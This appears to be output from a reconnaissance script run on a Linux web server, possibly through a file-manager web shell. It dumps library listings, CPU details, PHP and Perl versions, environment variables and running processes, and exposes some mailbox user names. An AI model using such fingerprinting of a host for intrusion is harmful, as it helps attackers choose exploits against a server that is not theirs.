-rwxr-xr-x  1 root root    8904 2013-10-08 21:20:37.000000000 +0200 libBrokenLocale-2.5.so
lrwxrwxrwx  1 root root      22 2013-10-21 23:03:40.000000000 +0200 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x  1 root root   22336 2013-10-08 21:20:37.000000000 +0200 libSegFault.so
lrwxrwxrwx  1 root root      11 2012-03-13 15:17:39.000000000 +0100 libacl.so -> libacl.so.1
lrwxrwxrwx  1 root root      15 2012-03-13 15:16:01.000000000 +0100 libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x  1 root root   27920 2012-02-22 14:57:53.000000000 +0100 libacl.so.1.1.0
-rwxr-xr-x  1 root root   20064 2013-10-08 21:20:37.000000000 +0200 libanl-2.5.so
lrwxrwxrwx  1 root root      13 2013-10-21 23:03:40.000000000 +0200 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx  1 root root      18 2009-04-01 16:41:35.000000000 +0200 libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x  1 root root  907552 2009-01-21 04:42:23.000000000 +0100 libasound.so.2.0.0
lrwxrwxrwx  1 root root      12 2010-02-15 21:49:02.000000000 +0100 libattr.so -> libattr.so.1
lrwxrwxrwx  1 root root      16 2007-11-25 19:29:08.000000000 +0100 libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x  1 root root   17888 2007-01-06 06:09:58.000000000 +0100 libattr.so.1.1.0
lrwxrwxrwx  1 root root      17 2012-03-13 15:15:58.000000000 +0100 libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x  1 root root   98920 2012-02-22 16:10:07.000000000 +0100 libaudit.so.0.0.0
lrwxrwxrwx  1 root root      19 2012-03-13 15:15:58.000000000 +0100 libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x  1 root root   62200 2012-02-22 16:10:07.000000000 +0100 libauparse.so.0.0.0
lrwxrwxrwx  1 root root      15 2013-05-18 10:36:32.000000000 +0200 libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x  1 root root   43840 2013-05-09 13:08:17.000000000 +0200 libblkid.so.1.0
-rwxr-xr-x  1 root root 1726472 2013-10-08 21:20:38.000000000 +0200 libc-2.5.so
lrwxrwxrwx  1 root root      11 2013-10-21 23:03:40.000000000 +0200 libc.so.6 -> libc-2.5.so
lrwxrwxrwx  1 root root      14 2007-11-25 19:29:08.000000000 +0100 libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x  1 root root   17384 2007-03-14 19:13:01.000000000 +0100 libcap.so.1.10
-rwxr-xr-x  1 root root  197744 2013-10-08 21:20:38.000000000 +0200 libcidn-2.5.so
lrwxrwxrwx  1 root root      14 2013-10-21 23:03:40.000000000 +0200 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx  1 root root      17 2013-05-18 10:36:32.000000000 +0200 libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x  1 root root   10096 2013-05-09 13:08:17.000000000 +0200 libcom_err.so.2.1
-rwxr-xr-x  1 root root   48600 2013-10-08 21:20:38.000000000 +0200 libcrypt-2.5.so
lrwxrwxrwx  1 root root      15 2013-10-21 23:03:40.000000000 +0200 libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x  1 root root 1450080 2014-08-27 22:32:34.000000000 +0200 libcrypto.so.0.9.8n
lrwxrwxrwx  1 root root      19 2014-08-27 22:39:18.000000000 +0200 libcrypto.so.6 -> libcrypto.so.0.9.8n
lrwxrwxrwx  1 root root      19 2014-08-27 22:39:18.000000000 +0200 libcrypto.so.8 -> libcrypto.so.0.9.8n
-rwxr-xr-x  1 root root 1008656 2010-07-12 18:09:33.000000000 +0200 libdb-4.3.so
lrwxrwxrwx  1 root root      18 2013-10-21 23:04:29.000000000 +0200 libdbus-1.so -> libdbus-1.so.3.4.0
lrwxrwxrwx  1 root root      18 2013-10-21 23:04:27.000000000 +0200 libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x  1 root root  243288 2013-10-01 23:59:24.000000000 +0200 libdbus-1.so.3.4.0
lrwxrwxrwx  1 root root      31 2013-10-21 23:04:16.000000000 +0200 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
-r-xr-xr-x  1 root root    6712 2013-10-01 21:32:01.000000000 +0200 libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx  1 root root      46 2013-10-21 23:04:16.000000000 +0200 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx  1 root root      48 2013-10-21 23:04:16.000000000 +0200 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
-r--r--r--  1 root root   64678 2012-02-22 18:18:02.000000000 +0100 libdevmapper-event.a
lrwxrwxrwx  1 root root      26 2012-03-13 15:15:57.000000000 +0100 libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x  1 root root   21856 2012-02-22 18:18:06.000000000 +0100 libdevmapper-event.so.1.02
-r--r--r--  1 root root  717564 2012-02-22 18:17:57.000000000 +0100 libdevmapper.a
lrwxrwxrwx  1 root root      20 2012-03-13 15:15:57.000000000 +0100 libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x  1 root root  154640 2012-02-22 18:18:06.000000000 +0100 libdevmapper.so.1.02
-rwxr-xr-x  1 root root   23360 2013-10-08 21:20:38.000000000 +0200 libdl-2.5.so
lrwxrwxrwx  1 root root      12 2013-10-21 23:03:40.000000000 +0200 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx  1 root root      34 2013-03-30 03:29:13.000000000 +0100 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
-rwxr-xr-x  1 root root   22256 2011-07-22 07:07:30.000000000 +0200 libdmraid-events-isw.so.1.0.0.rc13
-r-xr-xr-x  1 root root   22256 2011-07-22 07:07:30.000000000 +0200 libdmraid-events-isw.so.1.0.0.rc13-17
lrwxrwxrwx  1 root root      23 2013-03-30 03:29:13.000000000 +0100 libdmraid.so -> libdmraid.so.1.0.0.rc13
-rwxr-xr-x  1 root root  212736 2011-07-22 07:07:30.000000000 +0200 libdmraid.so.1.0.0.rc13
-r-xr-xr-x  1 root root  215256 2011-07-22 07:07:30.000000000 +0200 libdmraid.so.1.0.0.rc13-17
lrwxrwxrwx  1 root root      13 2013-05-18 10:36:32.000000000 +0200 libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x  1 root root   26424 2013-05-09 13:08:17.000000000 +0200 libe2p.so.2.3
lrwxrwxrwx  1 root root      13 2014-01-02 23:14:59.000000000 +0100 libe4p.so.2 -> libe4p.so.2.3
-rwxr-xr-x  1 root root   25024 2013-12-05 14:55:37.000000000 +0100 libe4p.so.2.3
lrwxrwxrwx  1 root root      18 2013-10-15 23:21:34.000000000 +0200 libevtlog.so.0 -> libevtlog.so.0.0.0
-rwxr-xr-x  1 root root   16648 2011-05-02 22:34:24.000000000 +0200 libevtlog.so.0.0.0
lrwxrwxrwx  1 root root      17 2012-10-24 14:00:17.000000000 +0200 libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x  1 root root  144344 2012-06-13 16:35:35.000000000 +0200 libexpat.so.0.5.0
lrwxrwxrwx  1 root root      16 2013-05-18 10:36:32.000000000 +0200 libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x  1 root root  122296 2013-05-09 13:08:17.000000000 +0200 libext2fs.so.2.4
lrwxrwxrwx  1 root root      16 2014-01-02 23:14:59.000000000 +0100 libext4fs.so.2 -> libext4fs.so.2.4
-rwxr-xr-x  1 root root  187360 2013-12-05 14:55:37.000000000 +0100 libext4fs.so.2.4
-rwxr-xr-x  1 root root   58400 2013-01-08 18:50:29.000000000 +0100 libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx  1 root root      28 2013-03-08 21:46:19.000000000 +0100 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
-rw-r--r--  1 root root 1197838 2009-03-25 02:47:43.000000000 +0100 libglib-2.0.a
lrwxrwxrwx  1 root root      23 2009-04-01 16:40:36.000000000 +0200 libglib-2.0.so -> libglib-2.0.so.0.1200.3
lrwxrwxrwx  1 root root      23 2009-04-01 16:40:31.000000000 +0200 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  647608 2009-03-25 02:47:43.000000000 +0100 libglib-2.0.so.0.1200.3
-rw-r--r--  1 root root   13724 2009-03-25 02:47:43.000000000 +0100 libgmodule-2.0.a
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:36.000000000 +0200 libgmodule-2.0.so -> libgmodule-2.0.so.0.1200.3
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:31.000000000 +0200 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x  1 root root   13520 2009-03-25 02:47:43.000000000 +0100 libgmodule-2.0.so.0.1200.3
-rw-r--r--  1 root root  544800 2009-03-25 02:47:43.000000000 +0100 libgobject-2.0.a
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:36.000000000 +0200 libgobject-2.0.so -> libgobject-2.0.so.0.1200.3
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:31.000000000 +0200 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  262904 2009-03-25 02:47:43.000000000 +0100 libgobject-2.0.so.0.1200.3
-rw-r--r--  1 root root   21376 2009-03-25 02:47:43.000000000 +0100 libgthread-2.0.a
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:36.000000000 +0200 libgthread-2.0.so -> libgthread-2.0.so.0.1200.3
lrwxrwxrwx  1 root root      26 2009-04-01 16:40:31.000000000 +0200 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x  1 root root   19176 2009-03-25 02:47:43.000000000 +0100 libgthread-2.0.so.0.1200.3
-rwxr-xr-x  1 root root   31576 2007-03-15 04:16:08.000000000 +0100 libiw.so.28
-rwxr-xr-x  1 root root    9472 2007-01-06 08:55:38.000000000 +0100 libkeyutils-1.2.so
lrwxrwxrwx  1 root root      18 2007-12-03 08:58:24.000000000 +0100 libkeyutils.so.1 -> libkeyutils-1.2.so
-r--r--r--  1 root root 5895212 2013-10-01 21:31:59.000000000 +0200 liblvm2cmd.a
lrwxrwxrwx  1 root root      18 2013-10-21 23:04:16.000000000 +0200 liblvm2cmd.so -> liblvm2cmd.so.2.02
-r-xr-xr-x  1 root root  801784 2013-10-01 21:32:01.000000000 +0200 liblvm2cmd.so.2.02
-rwxr-xr-x  1 root root  614992 2013-10-08 21:20:38.000000000 +0200 libm-2.5.so
lrwxrwxrwx  1 root root      11 2013-10-21 23:03:40.000000000 +0200 libm.so.6 -> libm-2.5.so
lrwxrwxrwx  1 root root      15 2014-02-13 00:10:18.000000000 +0100 libnet.so.1 -> libnet.so.1.7.0
-rwxr-xr-x  1 root root   92424 2013-12-21 00:20:51.000000000 +0100 libnet.so.1.7.0
-rwxr-xr-x  1 root root  114352 2013-10-08 21:20:38.000000000 +0200 libnsl-2.5.so
lrwxrwxrwx  1 root root      13 2013-10-21 23:03:40.000000000 +0200 libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x  1 root root   43128 2013-10-08 21:20:38.000000000 +0200 libnss_compat-2.5.so
lrwxrwxrwx  1 root root      20 2013-10-21 23:03:40.000000000 +0200 libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x  1 root root   23736 2013-10-08 21:20:38.000000000 +0200 libnss_dns-2.5.so
lrwxrwxrwx  1 root root      17 2013-10-21 23:03:40.000000000 +0200 libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x  1 root root   53880 2013-10-08 21:20:38.000000000 +0200 libnss_files-2.5.so
lrwxrwxrwx  1 root root      19 2013-10-21 23:03:40.000000000 +0200 libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x  1 root root   24736 2013-10-08 21:20:38.000000000 +0200 libnss_hesiod-2.5.so
lrwxrwxrwx  1 root root      20 2013-10-21 23:03:40.000000000 +0200 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x  1 root root   53544 2013-10-08 21:20:38.000000000 +0200 libnss_nis-2.5.so
lrwxrwxrwx  1 root root      17 2013-10-21 23:03:40.000000000 +0200 libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x  1 root root   62944 2013-10-08 21:20:38.000000000 +0200 libnss_nisplus-2.5.so
lrwxrwxrwx  1 root root      21 2013-10-21 23:03:40.000000000 +0200 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx  1 root root      16 2013-03-08 21:47:24.000000000 +0100 libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x  1 root root   46800 2013-01-09 06:29:27.000000000 +0100 libpam.so.0.81.5
lrwxrwxrwx  1 root root      21 2013-03-08 21:47:24.000000000 +0100 libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x  1 root root   13456 2013-01-09 06:29:26.000000000 +0100 libpam_misc.so.0.81.2
lrwxrwxrwx  1 root root      17 2013-03-08 21:47:24.000000000 +0100 libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x  1 root root   11264 2013-01-09 06:29:27.000000000 +0100 libpamc.so.0.81.0
lrwxrwxrwx  1 root root      16 2011-10-08 00:25:29.000000000 +0200 libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x  1 root root  962248 2011-09-13 15:28:11.000000000 +0200 libpcre.so.0.0.1
-rwxr-xr-x  1 root root   61248 2013-10-01 22:37:04.000000000 +0200 libproc-3.2.7.so
-rwxr-xr-x  1 root root  149968 2013-10-08 21:20:38.000000000 +0200 libpthread-2.5.so
lrwxrwxrwx  1 root root      17 2013-10-21 23:03:40.000000000 +0200 libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x  1 root root   92816 2013-10-08 21:20:38.000000000 +0200 libresolv-2.5.so
lrwxrwxrwx  1 root root      16 2013-10-21 23:03:40.000000000 +0200 libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x  1 root root   53448 2013-10-08 21:20:38.000000000 +0200 librt-2.5.so
lrwxrwxrwx  1 root root      12 2013-10-21 23:03:40.000000000 +0200 librt.so.1 -> librt-2.5.so
-rwxr-xr-x  1 root root   95464 2011-03-06 05:48:31.000000000 +0100 libselinux.so.1
-rwxr-xr-x  1 root root  159592 2009-09-04 00:47:06.000000000 +0200 libsemanage.so.1
-rwxr-xr-x  1 root root  247496 2010-03-31 10:17:32.000000000 +0200 libsepol.so.1
lrwxrwxrwx  1 root root      12 2013-05-18 10:36:32.000000000 +0200 libss.so.2 -> libss.so.2.0
-rwxr-xr-x  1 root root   26688 2013-05-09 13:08:17.000000000 +0200 libss.so.2.0
-rwxr-xr-x  1 root root  352408 2014-08-27 22:32:34.000000000 +0200 libssl.so.0.9.8n
lrwxrwxrwx  1 root root      16 2014-08-27 22:39:18.000000000 +0200 libssl.so.6 -> libssl.so.0.9.8n
lrwxrwxrwx  1 root root      16 2014-08-27 22:39:18.000000000 +0200 libssl.so.8 -> libssl.so.0.9.8n
lrwxrwxrwx  1 root root      19 2007-11-25 19:29:01.000000000 +0100 libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x  1 root root   15584 2007-01-06 17:58:47.000000000 +0100 libtermcap.so.2.0.8
-rwxr-xr-x  1 root root   39136 2013-10-08 21:20:38.000000000 +0200 libthread_db-1.0.so
lrwxrwxrwx  1 root root      19 2013-10-21 23:03:40.000000000 +0200 libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x  1 root root   18152 2013-10-08 21:20:38.000000000 +0200 libutil-2.5.so
lrwxrwxrwx  1 root root      14 2013-10-21 23:03:40.000000000 +0200 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx  1 root root      14 2013-05-18 10:36:32.000000000 +0200 libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x  1 root root   17936 2013-05-09 13:08:17.000000000 +0200 libuuid.so.1.2
lrwxrwxrwx  1 root root      22 2013-03-08 21:47:18.000000000 +0100 libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x  1 root root   33792 2013-01-09 07:08:11.000000000 +0100 libvolume_id.so.0.66.0
lrwxrwxrwx  1 root root      16 2009-10-22 11:54:17.000000000 +0200 libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x  1 root root   37368 2009-09-22 00:29:33.000000000 +0200 libwrap.so.0.7.6
lrwxrwxrwx  1 root root      13 2013-03-08 21:47:25.000000000 +0100 libz.so -> libz.so.1.2.3
lrwxrwxrwx  1 root root      13 2013-03-08 21:47:02.000000000 +0100 libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x  1 root root   85544 2012-07-17 10:32:04.000000000 +0200 libz.so.1.2.3
drwxr-xr-x  2 root root    4096 2013-10-21 23:03:40.000000000 +0200 rtkaio
drwxr-xr-x  3 root root    4096 2014-07-07 00:02:02.000000000 +0200 security

================================================
cat /proc/cpuinfo
================================================
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5335  @ 2.00GHz
stepping	: 7
microcode	: 0x66
cpu MHz		: 2000.148
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 3
initial apicid	: 3
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu de tsc msr pae cx8 apic sep cmov pat clflush mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl pni ssse3 cx16 hypervisor lahf_lm dtherm
bogomips	: 4000.29
clflush size	: 64
cache_alignment	: 64
address sizes	: 36 bits physical, 48 bits virtual
power management:

processor	: 1
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5335  @ 2.00GHz
stepping	: 7
microcode	: 0x66
cpu MHz		: 2000.148
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 3
initial apicid	: 3
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu de tsc msr pae cx8 apic sep cmov pat clflush mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl pni ssse3 cx16 hypervisor lahf_lm dtherm
bogomips	: 4000.29
clflush size	: 64
cache_alignment	: 64
address sizes	: 36 bits physical, 48 bits virtual
power management:

processor	: 2
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5335  @ 2.00GHz
stepping	: 7
microcode	: 0x66
cpu MHz		: 2000.148
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 3
initial apicid	: 3
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu de tsc msr pae cx8 apic sep cmov pat clflush mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl pni ssse3 cx16 hypervisor lahf_lm dtherm
bogomips	: 4000.29
clflush size	: 64
cache_alignment	: 64
address sizes	: 36 bits physical, 48 bits virtual
power management:

processor	: 3
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5335  @ 2.00GHz
stepping	: 7
microcode	: 0x66
cpu MHz		: 2000.148
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 3
initial apicid	: 3
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu de tsc msr pae cx8 apic sep cmov pat clflush mmx fxsr sse sse2 ss ht syscall nx lm constant_tsc rep_good nopl pni ssse3 cx16 hypervisor lahf_lm dtherm
bogomips	: 4000.29
clflush size	: 64
cache_alignment	: 64
address sizes	: 36 bits physical, 48 bits virtual
power management:


================================================
ls -la /libexec
================================================

================================================
php -v
================================================
PHP 5.2.17 (cli) (built: Dec 16 2013 08:47:17) 
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.33, Copyright (c) 2007-2012, by SektionEins GmbH

================================================
perl -v
================================================

This is perl, v5.8.8 built for x86_64-linux-thread-multi

Copyright 1987-2006, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.


================================================
ls -la /usr/sbin/wicd
================================================

================================================
env
================================================
XREMOTE_ADDR=***.***.***.***
MONIT_DATE=Fri, 12 Sep 2014 08:38:57
XHTTP_HOST=www.*******.**
MONIT_HOST=*******.*******.**
XDOCUMENT_ROOT=/var/www/virtual/*******.**/htdocs
XSCRIPT_FILENAME=/var/www/virtual/*******.**/htdocs/admin/filemanager/*************
PATH=/sbin:/usr/sbin:/bin:/usr/bin
PWD=/tmp/.ICE-unix
LANG=C
MONIT_PROCESS_PID=0
MONIT_EVENT=Started
MONIT_PROCESS_MEMORY=0
SHLVL=4
MONIT_PROCESS_CPU_PERCENT=0
MONIT_SERVICE=httpd
MONIT_PROCESS_CHILDREN=0
XSCRIPT_NAME=/admin/filemanager/***************
MONIT_DESCRIPTION=Started
_=/bin/env

================================================
ps -aux
================================================
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  10420   440 ?        Ss   Aug27   0:42 init [3]                                                                         
root         2  0.0  0.0      0     0 ?        S    Aug27   0:02 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Aug27   3:13 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/0:0H]
root         7  0.4  0.0      0     0 ?        S    Aug27 102:47 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    Aug27   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    Aug27   0:28 [migration/0]
root        10  0.0  0.0      0     0 ?        S    Aug27   0:17 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    Aug27   0:20 [watchdog/1]
root        12  0.0  0.0      0     0 ?        S    Aug27   0:39 [migration/1]
root        13  0.0  0.0      0     0 ?        S    Aug27   1:24 [ksoftirqd/1]
root        15  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/1:0H]
root        16  0.0  0.0      0     0 ?        S    Aug27   0:19 [watchdog/2]
root        17  0.0  0.0      0     0 ?        S    Aug27   0:29 [migration/2]
root        18  0.0  0.0      0     0 ?        S    Aug27   1:23 [ksoftirqd/2]
root        20  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/2:0H]
root        21  0.0  0.0      0     0 ?        S    Aug27   0:18 [watchdog/3]
root        22  0.0  0.0      0     0 ?        S    Aug27   0:26 [migration/3]
root        23  0.0  0.0      0     0 ?        S    Aug27   1:22 [ksoftirqd/3]
root        25  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/3:0H]
root        26  0.0  0.0      0     0 ?        S<   Aug27   0:00 [khelper]
root        27  0.0  0.0      0     0 ?        S    Aug27   0:00 [kdevtmpfs]
root        28  0.0  0.0      0     0 ?        S<   Aug27   0:00 [netns]
root        29  0.0  0.0      0     0 ?        S    Aug27   0:00 [xenwatch]
root        30  0.0  0.0      0     0 ?        S    Aug27   0:00 [xenbus]
root        31  0.0  0.0      0     0 ?        S<   Aug27   0:00 [writeback]
root        32  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kintegrityd]
root        33  0.0  0.0      0     0 ?        S<   Aug27   0:00 [bioset]
root        34  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kblockd]
root        36  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ata_sff]
root        37  0.0  0.0      0     0 ?        S    Aug27   0:00 [khubd]
root        38  0.0  0.0      0     0 ?        S<   Aug27   0:00 [md]
root        39  0.0  0.0      0     0 ?        S<   Aug27   0:00 [devfreq_wq]
root        42  0.0  0.0      0     0 ?        S    Aug27   0:00 [khungtaskd]
root        43  0.0  0.0      0     0 ?        S    Aug27  19:59 [kswapd0]
root        44  0.0  0.0      0     0 ?        SN   Aug27   0:00 [ksmd]
root        45  0.0  0.0      0     0 ?        S    Aug27   0:00 [fsnotify_mark]
root        46  0.0  0.0      0     0 ?        S<   Aug27   0:00 [crypto]
root        54  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kthrotld]
root        56  0.0  0.0      0     0 ?        S    Aug27   0:00 [khvcd]
root        57  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kpsmoused]
root        58  0.0  0.0      0     0 ?        S<   Aug27   0:00 [deferwq]
root        59  0.0  0.0      0     0 ?        S<   Aug27   0:00 [charger_manager]
root        69  0.0  0.0      0     0 ?        S<   Aug27  12:24 [kworker/0:1H]
root        71  0.0  0.0      0     0 ?        S    Aug27  15:32 [kjournald]
root       122  0.0  0.0  12744   324 ?        S<s  Aug27   0:00 /sbin/udevd -d
postfix   1132  0.0  0.0  71624  3168 ?        S    14:24   0:00 pickup -l -t fifo -u -c
root      1215  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kmpathd]
root      1216  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kmpath_handlerd]
root      1246  0.0  0.0      0     0 ?        S    Aug27   0:13 [jbd2/xvda3-8]
root      1247  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-rsv-conver]
root      1248  0.0  0.0      0     0 ?        S    Aug27   1:38 [jbd2/xvda4-8]
root      1249  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-rsv-conver]
root      1250  0.0  0.0      0     0 ?        S    Aug27   1:57 [jbd2/xvda5-8]
root      1251  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-rsv-conver]
root      1252  0.0  0.0      0     0 ?        S    Aug27   0:54 [jbd2/xvda6-8]
root      1253  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-rsv-conver]
root      1254  0.0  0.0      0     0 ?        S    Aug27   2:19 [jbd2/xvda7-8]
root      1255  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-rsv-conver]
postfix   1446  0.0  0.0  71760  3500 ?        S    14:25   0:00 trivial-rewrite -n rewrite -t unix -u -c
dbus      1656  0.0  0.0  21332   328 ?        Ss   Aug27   0:00 dbus-daemon --system
root      1694  0.1  0.0  17472  1168 ?        Ss   Aug27  36:14 syslog-ng -p /var/run/syslog-ng.pid
root      1728  0.0  0.0      0     0 ?        S    14:26   0:00 [kworker/3:1]
root      1748  0.0  0.0  51252   348 ?        Ss   Aug27   0:00 /usr/sbin/sshd
postfix   1751  0.0  0.0  71776  3672 ?        S    14:26   0:00 cleanup -z -t unix -u -c
postfix   1752  0.0  0.0  71676  3408 ?        S    14:26   0:00 virtual -t unix
root      1759  0.0  0.0  21712   372 ?        Ss   Aug27   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp       1773  0.0  0.0  27592   880 ?        Ss   Aug27   2:33 /usr/sbin/ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root      1791  0.0  0.0  33996  1768 ?        S    14:26   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
vmail     1792  0.0  0.0  16888   928 ?        S    14:26   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/***********.**/*****
root      1810  0.0  0.0  66132   452 ?        S    Aug27   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/usr --user=mysql
root      1987  0.0  0.0      0     0 ?        S    14:26   0:00 [kworker/u8:0]
root      2233  0.0  0.0  33996  1768 ?        S    14:27   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root      2234  0.0  0.0  33996  1764 ?        S    14:27   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root      2235  0.0  0.0  33996  1768 ?        S    14:27   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root      2236  0.0  0.0  33996  1764 ?        S    14:27   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
vmail     2237  0.0  0.0  10304   600 ?        S    14:27   0:00 /usr/lib/courier/libexec/courier/courierpop3d /var/mail/virtual/*******.**/pankrac
vmail     2238  0.0  0.0  10304   608 ?        S    14:27   0:00 /usr/lib/courier/libexec/courier/courierpop3d /var/mail/virtual/*******.**/ivana.medricka
vmail     2239  0.0  0.0  10304   468 ?        S    14:27   0:00 /usr/lib/courier/libexec/courier/courierpop3d /var/mail/virtual/*******.**/ungelt
vmail     2240  0.0  0.0  10304   680 ?        S    14:27   0:00 /usr/lib/courier/libexec/courier/courierpop3d /var/mail/virtual/*******.**/ivana.medricka
mysql     2486 57.4 50.5 4355264 2816812 ?     Sl   Aug27 14525:51 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/lib/mysql/slunecnice.*******.**.err --open-files-limit=500000 --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/lib/mysql/mysql.sock --port=3306
